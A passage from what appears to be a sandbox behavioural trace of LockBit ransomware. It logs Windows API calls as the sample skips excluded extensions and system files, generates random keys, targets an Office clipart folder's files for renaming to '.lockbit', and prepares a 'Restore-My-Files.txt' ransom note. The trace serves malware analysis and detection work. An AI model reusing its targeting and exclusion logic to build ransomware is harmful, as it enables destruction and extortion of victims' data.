(lpString1=".dll", lpString2=".WMF") returned -1 [0147.944] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0147.944] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0147.944] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0147.944] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.944] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0147.944] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0147.944] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0147.944] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0147.944] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0185834.WMF") returned 1 [0147.945] lstrcmpiW (lpString1="ntldr", lpString2="J0185834.WMF") returned 1 [0147.945] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0185834.WMF") returned 1 [0147.945] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0185834.WMF") returned -1 [0147.945] lstrcmpiW (lpString1="autorun.inf", lpString2="J0185834.WMF") returned -1 [0147.945] lstrcmpiW (lpString1="thumbs.db", lpString2="J0185834.WMF") returned 1 [0147.945] lstrcmpiW (lpString1="iconcache.db", lpString2="J0185834.WMF") returned -1 [0147.945] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0147.945] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185834.WMF") returned=".WMF" [0147.945] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0147.945] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0147.945] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0147.945] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0147.945] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0147.945] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0147.945] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0147.945] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0147.945] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0147.945] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0147.945] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0147.945] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0147.945] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0147.945] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0147.945] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0147.945] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0147.946] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0147.946] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0147.946] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0147.946] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0147.946] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0147.946] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0147.946] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0147.946] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0147.946] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0147.946] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0147.946] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0147.946] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0147.946] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185834.WMF.lockbit") returned 72 [0147.946] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185834.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185834.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0147.948] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0147.948] malloc (_Size=0x40068) returned 0x3df0008 [0147.948] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=8578) returned 1 [0147.948] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.948] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.949] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0147.949] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.949] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.949] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0147.949] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0147.954] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185834.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185834.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0147.954] malloc (_Size=0xa6) returned 0x1fa2ed8 [0147.955] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0147.955] free (_Block=0x1fa2ed8) [0147.955] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185834.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0147.955] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0147.955] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0147.956] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65fbf9f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x37e4, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0185842.WMF", cAlternateFileName="")) returned 1 [0147.956] lstrcmpiW (lpString1=".", lpString2="J0185842.WMF") returned -1 [0147.956] lstrcmpiW (lpString1="..", lpString2="J0185842.WMF") returned -1 [0147.956] PathFindExtensionW (pszPath="J0185842.WMF") returned=".WMF" [0147.956] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0147.956] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0147.956] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0147.956] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0147.956] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0147.956] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0147.956] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0147.956] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0147.956] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0147.956] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0147.956] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0147.956] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0147.956] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0147.956] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0147.956] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0147.956] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0147.956] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0147.957] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0147.957] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0147.957] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0147.957] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0147.957] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0147.957] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0147.957] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0147.957] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.957] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0147.957] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0147.957] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0147.957] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0147.957] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0147.957] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0147.957] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0147.957] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0147.957] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0147.957] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0147.957] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0147.957] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0147.957] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0147.957] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0147.957] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0147.957] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0147.958] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0147.958] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.958] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0147.958] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0147.958] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0147.958] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0147.958] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0185842.WMF") returned 1 [0147.958] lstrcmpiW (lpString1="ntldr", lpString2="J0185842.WMF") returned 1 [0147.958] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0185842.WMF") returned 1 [0147.958] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0185842.WMF") returned -1 [0147.958] lstrcmpiW (lpString1="autorun.inf", lpString2="J0185842.WMF") returned -1 [0147.958] lstrcmpiW (lpString1="thumbs.db", lpString2="J0185842.WMF") returned 1 [0147.958] lstrcmpiW (lpString1="iconcache.db", lpString2="J0185842.WMF") returned -1 [0147.958] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0147.958] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185842.WMF") returned=".WMF" [0147.958] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0147.958] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0147.958] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0147.958] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0147.958] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0147.958] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0147.958] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0147.958] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0147.958] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0147.958] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0147.959] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0147.959] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0147.959] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0147.959] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0147.959] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0147.959] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0147.959] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0147.959] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0147.959] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0147.959] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0147.959] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0147.959] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0147.959] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0147.959] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0147.959] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0147.959] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0147.959] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0147.959] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0147.959] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185842.WMF.lockbit") returned 72 [0147.959] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185842.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185842.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0147.961] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0147.961] malloc (_Size=0x40068) returned 0x3df0008 [0147.961] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=14308) returned 1 [0147.961] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.962] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.962] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0147.962] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.963] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.963] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0147.963] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0147.969] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185842.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185842.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0147.969] malloc (_Size=0xa6) returned 0x1fa2ed8 [0147.969] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0147.969] free (_Block=0x1fa2ed8) [0147.969] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185842.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0147.969] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0147.969] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0147.969] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65fbf9f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x21da, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0186346.WMF", cAlternateFileName="")) returned 1 [0147.969] lstrcmpiW (lpString1=".", lpString2="J0186346.WMF") returned -1 [0147.969] lstrcmpiW (lpString1="..", lpString2="J0186346.WMF") returned -1 [0147.969] PathFindExtensionW (pszPath="J0186346.WMF") returned=".WMF" [0147.969] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0147.970] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0147.970] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0147.970] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0147.970] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0147.970] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0147.970] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0147.970] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0147.970] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0147.970] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0147.970] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0147.970] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0147.970] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0147.970] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0147.970] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0147.970] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0147.970] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0147.970] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0147.970] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0147.970] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0147.970] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0147.970] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0147.970] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0147.970] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0147.970] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.970] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0147.971] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0147.971] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0147.971] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0147.971] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0147.971] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0147.971] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0147.971] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0147.971] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0147.971] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0147.971] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0147.971] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0147.971] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0147.971] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0147.971] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0147.971] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0147.971] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0147.971] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.971] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0147.971] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0147.971] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0147.971] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0147.971] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0186346.WMF") returned 1 [0147.971] lstrcmpiW (lpString1="ntldr", lpString2="J0186346.WMF") returned 1 [0147.971] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0186346.WMF") returned 1 [0147.971] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0186346.WMF") returned -1 [0147.972] lstrcmpiW (lpString1="autorun.inf", lpString2="J0186346.WMF") returned -1 [0147.972] lstrcmpiW (lpString1="thumbs.db", lpString2="J0186346.WMF") returned 1 [0147.972] lstrcmpiW (lpString1="iconcache.db", lpString2="J0186346.WMF") returned -1 [0147.972] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0147.972] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186346.WMF") returned=".WMF" [0147.972] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0147.972] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0147.972] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0147.972] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0147.972] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0147.972] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0147.972] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0147.972] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0147.972] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0147.972] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0147.972] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0147.972] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0147.972] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0147.972] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0147.973] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0147.973] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0147.973] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0147.973] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0147.973] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0147.973] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0147.973] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0147.973] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0147.973] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0147.973] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0147.973] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0147.973] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0147.973] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0147.973] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0147.973] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186346.WMF.lockbit") returned 72 [0147.973] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186346.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0186346.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0147.974] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0147.974] malloc (_Size=0x40068) returned 0x3df0008 [0147.974] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=8666) returned 1 [0147.974] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.975] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.975] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0147.975] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.975] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.976] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0147.976] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0147.981] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186346.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186346.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0147.981] malloc (_Size=0xa6) returned 0x1fa2ed8 [0147.981] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0147.982] free (_Block=0x1fa2ed8) [0147.983] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186346.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0147.983] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0147.983] 